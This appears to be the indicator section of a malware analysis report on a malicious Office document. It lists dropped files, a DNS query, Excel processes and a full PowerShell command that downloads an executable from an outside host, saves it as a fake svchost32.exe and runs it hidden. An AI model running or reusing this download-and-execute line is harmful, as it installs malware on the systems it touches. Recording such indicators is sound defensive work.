Technical information
- https://fbcom.review/f/8.exe as %temp%\svchost32.exe
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.word\~wrf{490d11ed-17d4-469a-9aea-adde689a9a3c}.tmp
- DNS ASK fb###.review
- '%ProgramFiles%\microsoft office\office14\excel.exe' -Embedding
- '%ProgramFiles%\microsoft office\office14\excelcnv.exe' -Embedding
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' (New-Object System.Net.WebClient).DownloadFile('https://fbcom.review/f/8.exe','%TEMP%\svchost32.exe');Start-Process '%TEMP%\svchost32.exe' (with a hidden window)